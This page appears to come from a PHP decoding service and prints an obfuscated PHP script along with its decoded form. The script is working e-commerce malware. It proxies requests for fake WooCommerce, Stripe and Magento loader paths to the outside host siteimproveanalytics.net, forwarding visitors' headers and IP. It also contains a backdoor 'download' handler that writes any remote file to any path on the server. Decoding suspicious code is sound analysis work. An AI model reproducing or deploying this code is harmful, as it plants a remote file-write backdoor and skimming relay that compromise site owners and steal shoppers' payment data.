Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto cMFfD; BR9k3: if (!function_exists("\x61\160\141\143\x68\145\x5f\162\x65\x71\..
Decoded Output download
<?php
goto cMFfD; BR9k3: if (!function_exists("apache_request_headers")) { function apache_request_headers() { $arh = array(); $rx_http = "/\AHTTP_/"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("_", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("-", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto SdEGe; cMFfD: $routing = array("/wp-content/plugins/woocommerce/loader.php" => '', "/modules/stripepro/loader.php" => '', "/pub/errors/track.php" => '', "/analytics" => ''); goto qMTvj; Mhb8z: function set_to_cache($name, $value, $expired) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto kHFsI; qMTvj: $dest = "siteimproveanalytics.net"; goto BR9k3; gePDX: function bad_request() { header("Location: https://google.com"); die; } goto ARGM0; YS7qX: function download() { if (isset($_GET["s"]) and isset($_GET["d"])) { $file_url = urldecode($_GET["s"]); $destination_path = urldecode($_GET["d"]); $fp = fopen($destination_path, "w+"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "File downloaded successfully!"; } else { echo "Error downloading file!"; } } else { echo dirname(__FILE__); } } goto MA48s; SdEGe: function get_ip_address() { $ip = ''; if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } return $ip; } goto gePDX; nH0a3: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\xa"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto YS7qX; ARGM0: function get_from_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto Mhb8z; MA48s: try { if ($_SERVER["REQUEST_METHOD"] !== "GET") { bad_request(); } if (isset($_GET["download"])) { download(); die; } $url = $_SERVER["REQUEST_URI"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["path"]; if (!isset($path) || $path == "/") { bad_request(); } $query = ''; $clear = false; if (isset($url["query"])) { parse_str($url["query"], $params); if (isset($params["path"])) { $path = $params["path"]; unset($params["path"]); } if (isset($params["cache"]) && $params["cache"] == "clear") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "/html/liveness") { echo "OK"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("ssl://" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code} ({$message})"); } fputs($fp, "GET " . $path . "?" . $query . " HTTP/1.1\xd\xa"); fputs($fp, "Host: " . $dest . "
\xa"); fputs($fp, "X-Forwarded-For: " . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "Host") !== 0 && strcasecmp($header, "X-Forwarded-For") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . ": " . $value . "\xd
"); } } } fputs($fp, "Connection: close\xd
\xd\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("
\xa
\xa", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("
", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "Content-Length") !== false) { continue; } if (strpos($headerLine, "Connection") !== false) { continue; } if (strpos($headerLine, "Date") !== false) { continue; } if ($headerLine == "Content-Encoding: gzip") { $is_gzip = true; continue; } if ($headerLine == "Transfer-Encoding: chunked") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "Cache-Control: public,max-age=") !== false) { $cache = intval(str_replace("Cache-Control: public,max-age=", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "404 Not Found") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto BYIOb; kHFsI: function remove_in_cache($name) { if (class_exists("Memcache")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("localhost"); if ($isAvailable) { $memcache->delete($name); } } } goto nH0a3; BYIOb: ?>
Did this file decode correctly?
Original Code
<?php
goto cMFfD; BR9k3: if (!function_exists("\x61\160\141\143\x68\145\x5f\162\x65\x71\165\x65\163\x74\x5f\x68\x65\x61\144\x65\x72\x73")) { function apache_request_headers() { $arh = array(); $rx_http = "\x2f\x5c\101\110\x54\124\x50\137\x2f"; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http, $key)) { $arh_key = preg_replace($rx_http, '', $key); $rx_matches = array(); $rx_matches = explode("\x5f", $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode("\x2d", $rx_matches); } $arh[$arh_key] = $val; } } return $arh; } } goto SdEGe; cMFfD: $routing = array("\57\167\x70\x2d\143\x6f\x6e\x74\145\156\x74\x2f\160\154\x75\x67\x69\156\163\x2f\x77\157\x6f\x63\x6f\155\155\145\162\143\145\x2f\154\157\141\144\x65\162\x2e\160\150\160" => '', "\57\155\157\x64\x75\154\x65\x73\x2f\163\164\162\x69\x70\x65\160\162\157\x2f\x6c\x6f\x61\144\145\162\x2e\x70\150\x70" => '', "\x2f\x70\x75\142\x2f\x65\162\x72\157\162\163\x2f\164\x72\x61\143\153\56\160\150\160" => '', "\x2f\141\x6e\141\x6c\171\164\151\143\163" => ''); goto qMTvj; Mhb8z: function set_to_cache($name, $value, $expired) { if (class_exists("\115\x65\x6d\x63\141\x63\x68\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\x6c\157\x63\141\154\x68\x6f\163\164"); if ($isAvailable) { $memcache->set($name, $value, 0, $expired); } } } goto kHFsI; qMTvj: $dest = "\x73\151\x74\x65\151\x6d\160\x72\x6f\166\x65\141\156\141\154\x79\x74\151\143\163\56\x6e\x65\x74"; goto BR9k3; gePDX: function bad_request() { header("\114\157\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\163\72\57\x2f\x67\157\x6f\147\x6c\x65\x2e\143\x6f\x6d"); die; } goto ARGM0; YS7qX: function download() { if (isset($_GET["\163"]) and isset($_GET["\x64"])) { $file_url = urldecode($_GET["\x73"]); $destination_path = urldecode($_GET["\144"]); $fp = fopen($destination_path, "\167\x2b"); $ch = curl_init($file_url); curl_setopt($ch, CURLOPT_FILE, $fp); curl_exec($ch); $st_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); fclose($fp); if ($st_code == 200) { echo "\106\151\x6c\x65\40\x64\157\x77\x6e\154\157\x61\144\145\x64\40\x73\165\x63\x63\x65\x73\163\x66\165\x6c\154\171\41"; } else { echo "\x45\x72\x72\157\x72\40\144\x6f\167\x6e\x6c\157\x61\x64\x69\x6e\x67\40\146\151\x6c\145\x21"; } } else { echo dirname(__FILE__); } } goto MA48s; SdEGe: function get_ip_address() { $ip = ''; if (isset($_SERVER["\110\124\124\x50\137\130\x5f\x46\117\122\x57\x41\122\104\x45\x44\x5f\106\x4f\x52"])) { $ip = $_SERVER["\110\124\x54\120\137\130\x5f\x46\x4f\122\127\x41\122\104\105\x44\x5f\106\x4f\122"]; } else { if (isset($_SERVER["\x48\124\124\120\137\103\114\x49\105\116\124\137\111\120"])) { $ip = $_SERVER["\x48\124\124\120\x5f\x43\114\111\105\116\124\x5f\111\x50"]; } else { $ip = $_SERVER["\x52\105\115\x4f\124\105\137\x41\x44\104\122"]; } } return $ip; } goto gePDX; nH0a3: function decode_chunked($str) { for ($res = ''; !empty($str); $str = trim($str)) { $pos = strpos($str, "\xd\xa"); $len = hexdec(substr($str, 0, $pos)); $res .= substr($str, $pos + 2, $len); $str = substr($str, $pos + 2 + $len); } return $res; } goto YS7qX; ARGM0: function get_from_cache($name) { if (class_exists("\115\145\155\143\x61\x63\150\x65")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\157\x63\141\154\x68\157\x73\x74"); if ($isAvailable) { $result = $memcache->get($name); if ($result) { return $result; } } } return null; } goto Mhb8z; MA48s: try { if ($_SERVER["\x52\105\x51\125\x45\x53\124\x5f\115\105\x54\x48\x4f\104"] !== "\x47\105\124") { bad_request(); } if (isset($_GET["\144\x6f\x77\156\154\157\x61\x64"])) { download(); die; } $url = $_SERVER["\x52\105\121\x55\x45\123\x54\x5f\x55\122\111"]; if (!isset($url) || $url == '') { bad_request(); } $url = parse_url($url); $path = $url["\160\x61\x74\x68"]; if (!isset($path) || $path == "\57") { bad_request(); } $query = ''; $clear = false; if (isset($url["\x71\x75\x65\162\x79"])) { parse_str($url["\161\165\x65\x72\171"], $params); if (isset($params["\x70\x61\x74\x68"])) { $path = $params["\160\141\164\150"]; unset($params["\160\141\x74\x68"]); } if (isset($params["\143\141\x63\x68\145"]) && $params["\x63\141\x63\x68\x65"] == "\143\x6c\145\x61\x72") { $clear = true; } $query = http_build_query($params); } foreach ($routing as $key => $value) { if (strpos($path, $key) !== false) { $path = str_replace($key, $value, $path); } } if ($path == "\x2f\x68\x74\155\x6c\x2f\154\151\166\x65\x6e\x65\x73\163") { echo "\x4f\x4b"; die(1); } if ($clear) { remove_in_cache($path); } $cached = true; $response = get_from_cache($path); if (!isset($response)) { $cached = false; $fp = fsockopen("\163\x73\154\x3a\57\57" . $dest, 443, $code, $mesage, 5); if (!$fp) { die("{$code}\x20\x28{$message}\x29"); } fputs($fp, "\x47\105\124\x20" . $path . "\77" . $query . "\x20\110\124\124\120\x2f\x31\x2e\61\xd\xa"); fputs($fp, "\x48\x6f\x73\x74\72\40" . $dest . "\15\xa"); fputs($fp, "\130\55\x46\157\162\x77\x61\x72\144\145\x64\55\x46\157\x72\x3a\40" . get_ip_address() . "\xd\xa"); foreach (apache_request_headers() as $header => $value) { if (strcasecmp($header, "\110\x6f\163\x74") !== 0 && strcasecmp($header, "\x58\x2d\106\157\x72\167\141\x72\x64\x65\144\55\x46\157\x72") !== 0) { if (isset($value) && strlen($value) > 0) { fputs($fp, $header . "\72\x20" . $value . "\xd\12"); } } } fputs($fp, "\103\x6f\156\x6e\145\143\x74\x69\157\x6e\x3a\x20\143\154\157\x73\x65\xd\12\xd\xa"); while (!feof($fp)) { $response .= fgets($fp, 1024); } fclose($fp); } $result = explode("\15\xa\15\xa", $response, 2); if (!isset($result[0]) || !isset($result[1])) { bad_request(); } if (!headers_sent()) { header_remove(); } $headers = explode("\15\12", $result[0]); $cache = 0; $is_gzip = false; $is_chunked = false; foreach ($headers as $headerLine) { if (strpos($headerLine, "\x43\x6f\156\164\145\156\x74\x2d\114\145\156\x67\x74\150") !== false) { continue; } if (strpos($headerLine, "\x43\x6f\x6e\x6e\145\143\x74\151\157\x6e") !== false) { continue; } if (strpos($headerLine, "\x44\141\x74\145") !== false) { continue; } if ($headerLine == "\103\x6f\156\x74\x65\x6e\x74\x2d\105\156\143\x6f\x64\151\156\x67\x3a\x20\147\172\x69\160") { $is_gzip = true; continue; } if ($headerLine == "\x54\x72\x61\x6e\163\146\x65\162\x2d\105\156\x63\x6f\x64\151\x6e\147\72\x20\x63\x68\165\x6e\153\x65\144") { $is_chunked = true; continue; } if ($cached !== true && strpos($headerLine, "\x43\141\x63\150\x65\x2d\103\x6f\156\164\x72\x6f\154\x3a\40\x70\165\x62\x6c\151\143\54\x6d\141\x78\x2d\x61\147\x65\75") !== false) { $cache = intval(str_replace("\x43\x61\x63\x68\145\x2d\x43\157\x6e\x74\x72\x6f\154\72\x20\160\165\x62\x6c\151\x63\54\x6d\141\x78\x2d\141\147\x65\75", '', $headerLine)); } header($headerLine, true); if (strpos($headerLine, "\64\x30\64\x20\116\157\x74\40\x46\157\x75\x6e\x64") !== false) { die; } } if ($cache > 0) { set_to_cache($path, $response, $cache); } $contents = $result[1]; if ($is_chunked) { $contents = decode_chunked($contents); } if ($is_gzip) { $contents = gzdecode($contents); } echo $contents; } catch (Exception $e) { bad_request(); } goto BYIOb; kHFsI: function remove_in_cache($name) { if (class_exists("\115\145\155\x63\141\143\x68\145")) { $memcache = new Memcache(); $isAvailable = @$memcache->connect("\154\x6f\143\141\154\x68\157\x73\x74"); if ($isAvailable) { $memcache->delete($name); } } } goto nH0a3; BYIOb: ?>
Function Calls
None |
Stats
MD5 | 5bd132a64e61a349577a51de1bd95f00 |
Eval Count | 0 |
Decode Time | 59 ms |